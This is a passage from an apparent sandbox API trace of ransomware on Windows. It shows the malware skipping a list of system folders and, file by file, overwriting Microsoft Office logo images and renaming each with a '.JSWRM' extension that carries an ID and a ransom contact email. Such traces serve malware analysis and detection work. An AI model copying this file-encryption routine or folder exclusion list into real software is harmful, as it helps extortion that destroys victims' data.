lpNumberOfBytesWritten=0x345e898*=0x950, lpOverlapped=0x0) returned 1 [0132.587] CloseHandle (hObject=0x238) returned 1 [0132.587] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.contrast-white_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.contrast-white_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.contrast-white_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.588] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1992206f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1992206f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6fdbb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xaf9, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="FirstRunLogo.contrast-white_scale-180.png", cAlternateFileName="FI8E23~1.PNG")) returned 1 [0132.588] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-180.png", lpString2=".") returned 1 [0132.588] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-180.png", lpString2="..") returned 1 [0132.588] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-180.png", lpString2="...") returned 1 [0132.588] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-180.png", lpString2="windows") returned -1 [0132.588] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-180.png", lpString2="recovery") returned -1 [0132.588] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-180.png", lpString2="perflogs") returned -1 [0132.588] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-180.png", lpString2="documents and settings") returned 1 [0132.588] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0132.588] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-180.png", lpString2="system volume information") returned -1 [0132.588] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-180.png", lpString2="msocache") returned -1 [0132.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-white_scale-180.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0132.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-white_scale-180.png", cchWideChar=41, lpMultiByteStr=0x22cdc8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogo.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 41 [0132.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-white_scale-180.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0132.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-white_scale-180.png", cchWideChar=41, lpMultiByteStr=0x22ce70, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogo.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 41 [0132.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.589] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.contrast-white_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.589] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2809) returned 1 [0132.589] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.590] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xaf0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xaf0, lpOverlapped=0x0) returned 1 [0132.591] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.591] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xaf0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xaf0, lpOverlapped=0x0) returned 1 [0132.591] CloseHandle (hObject=0x238) returned 1 [0132.591] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.contrast-white_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.contrast-white_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.contrast-white_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.592] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1992206f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1992206f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1996e644, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x67d, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="FirstRunLogo.contrast-white_scale-80.png", cAlternateFileName="FI4144~1.PNG")) returned 1 [0132.592] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-80.png", lpString2=".") returned 1 [0132.592] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-80.png", lpString2="..") returned 1 [0132.592] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-80.png", lpString2="...") returned 1 [0132.592] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-80.png", lpString2="windows") returned -1 [0132.592] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-80.png", lpString2="recovery") returned -1 [0132.592] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-80.png", lpString2="perflogs") returned -1 [0132.592] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-80.png", lpString2="documents and settings") returned 1 [0132.592] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0132.592] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-80.png", lpString2="system volume information") returned -1 [0132.592] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-80.png", lpString2="msocache") returned -1 [0132.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-white_scale-80.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0132.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-white_scale-80.png", cchWideChar=40, lpMultiByteStr=0x22ce70, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogo.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 40 [0132.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-white_scale-80.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0132.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-white_scale-80.png", cchWideChar=40, lpMultiByteStr=0x22d0d8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogo.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 40 [0132.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.593] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.contrast-white_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.593] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1661) returned 1 [0132.593] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.594] ReadFile (in: hFile=0x238, lpBuffer=0x2323e8, nNumberOfBytesToRead=0x670, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesRead=0x345e89c*=0x670, lpOverlapped=0x0) returned 1 [0132.596] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.596] WriteFile (in: hFile=0x238, lpBuffer=0x2323e8*, nNumberOfBytesToWrite=0x670, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesWritten=0x345e898*=0x670, lpOverlapped=0x0) returned 1 [0132.596] CloseHandle (hObject=0x238) returned 1 [0132.596] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.contrast-white_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.contrast-white_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.contrast-white_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.597] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1992206f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1992206f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1996e644, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x71d, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="FirstRunLogo.scale-100.png", cAlternateFileName="FI1EC9~1.PNG")) returned 1 [0132.597] lstrcmpiW (lpString1="FirstRunLogo.scale-100.png", lpString2=".") returned 1 [0132.597] lstrcmpiW (lpString1="FirstRunLogo.scale-100.png", lpString2="..") returned 1 [0132.597] lstrcmpiW (lpString1="FirstRunLogo.scale-100.png", lpString2="...") returned 1 [0132.597] lstrcmpiW (lpString1="FirstRunLogo.scale-100.png", lpString2="windows") returned -1 [0132.597] lstrcmpiW (lpString1="FirstRunLogo.scale-100.png", lpString2="recovery") returned -1 [0132.597] lstrcmpiW (lpString1="FirstRunLogo.scale-100.png", lpString2="perflogs") returned -1 [0132.597] lstrcmpiW (lpString1="FirstRunLogo.scale-100.png", lpString2="documents and settings") returned 1 [0132.597] lstrcmpiW (lpString1="FirstRunLogo.scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0132.597] lstrcmpiW (lpString1="FirstRunLogo.scale-100.png", lpString2="system volume information") returned -1 [0132.597] lstrcmpiW (lpString1="FirstRunLogo.scale-100.png", lpString2="msocache") returned -1 [0132.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.scale-100.png", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0132.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.scale-100.png", cchWideChar=26, lpMultiByteStr=0x241330, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogo.scale-100.png", lpUsedDefaultChar=0x0) returned 26 [0132.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.scale-100.png", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0132.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.scale-100.png", cchWideChar=26, lpMultiByteStr=0x241308, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogo.scale-100.png", lpUsedDefaultChar=0x0) returned 26 [0132.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.597] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.598] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1821) returned 1 [0132.598] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.598] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x710, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x710, lpOverlapped=0x0) returned 1 [0132.600] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.600] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x710, lpOverlapped=0x0) returned 1 [0132.600] CloseHandle (hObject=0x238) returned 1 [0132.600] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.601] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1992206f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1992206f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1996e644, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8fa, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="FirstRunLogo.scale-140.png", cAlternateFileName="FIBF57~1.PNG")) returned 1 [0132.601] lstrcmpiW (lpString1="FirstRunLogo.scale-140.png", lpString2=".") returned 1 [0132.601] lstrcmpiW (lpString1="FirstRunLogo.scale-140.png", lpString2="..") returned 1 [0132.601] lstrcmpiW (lpString1="FirstRunLogo.scale-140.png", lpString2="...") returned 1 [0132.601] lstrcmpiW (lpString1="FirstRunLogo.scale-140.png", lpString2="windows") returned -1 [0132.601] lstrcmpiW (lpString1="FirstRunLogo.scale-140.png", lpString2="recovery") returned -1 [0132.601] lstrcmpiW (lpString1="FirstRunLogo.scale-140.png", lpString2="perflogs") returned -1 [0132.601] lstrcmpiW (lpString1="FirstRunLogo.scale-140.png", lpString2="documents and settings") returned 1 [0132.601] lstrcmpiW (lpString1="FirstRunLogo.scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0132.601] lstrcmpiW (lpString1="FirstRunLogo.scale-140.png", lpString2="system volume information") returned -1 [0132.601] lstrcmpiW (lpString1="FirstRunLogo.scale-140.png", lpString2="msocache") returned -1 [0132.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.scale-140.png", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0132.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.scale-140.png", cchWideChar=26, lpMultiByteStr=0x241268, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogo.scale-140.png", lpUsedDefaultChar=0x0) returned 26 [0132.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.scale-140.png", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0132.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.scale-140.png", cchWideChar=26, lpMultiByteStr=0x240fe8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogo.scale-140.png", lpUsedDefaultChar=0x0) returned 26 [0132.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.602] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.602] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2298) returned 1 [0132.602] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.602] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8f0, lpOverlapped=0x0) returned 1 [0132.608] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.608] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8f0, lpOverlapped=0x0) returned 1 [0132.608] CloseHandle (hObject=0x238) returned 1 [0132.608] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.609] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1992206f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1992206f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6fdbb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa82, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="FirstRunLogo.scale-180.png", cAlternateFileName="FI9277~1.PNG")) returned 1 [0132.609] lstrcmpiW (lpString1="FirstRunLogo.scale-180.png", lpString2=".") returned 1 [0132.609] lstrcmpiW (lpString1="FirstRunLogo.scale-180.png", lpString2="..") returned 1 [0132.609] lstrcmpiW (lpString1="FirstRunLogo.scale-180.png", lpString2="...") returned 1 [0132.609] lstrcmpiW (lpString1="FirstRunLogo.scale-180.png", lpString2="windows") returned -1 [0132.609] lstrcmpiW (lpString1="FirstRunLogo.scale-180.png", lpString2="recovery") returned -1 [0132.609] lstrcmpiW (lpString1="FirstRunLogo.scale-180.png", lpString2="perflogs") returned -1 [0132.609] lstrcmpiW (lpString1="FirstRunLogo.scale-180.png", lpString2="documents and settings") returned 1 [0132.609] lstrcmpiW (lpString1="FirstRunLogo.scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0132.609] lstrcmpiW (lpString1="FirstRunLogo.scale-180.png", lpString2="system volume information") returned -1 [0132.609] lstrcmpiW (lpString1="FirstRunLogo.scale-180.png", lpString2="msocache") returned -1 [0132.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.scale-180.png", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0132.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.scale-180.png", cchWideChar=26, lpMultiByteStr=0x240f70, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogo.scale-180.png", lpUsedDefaultChar=0x0) returned 26 [0132.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.scale-180.png", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0132.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.scale-180.png", cchWideChar=26, lpMultiByteStr=0x2413d0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogo.scale-180.png", lpUsedDefaultChar=0x0) returned 26 [0132.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.610] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.611] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2690) returned 1 [0132.611] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.611] ReadFile (in: hFile=0x238, lpBuffer=0x22fd48, nNumberOfBytesToRead=0xa80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesRead=0x345e89c*=0xa80, lpOverlapped=0x0) returned 1 [0132.612] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.612] WriteFile (in: hFile=0x238, lpBuffer=0x22fd48*, nNumberOfBytesToWrite=0xa80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesWritten=0x345e898*=0xa80, lpOverlapped=0x0) returned 1 [0132.613] CloseHandle (hObject=0x238) returned 1 [0132.613] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft 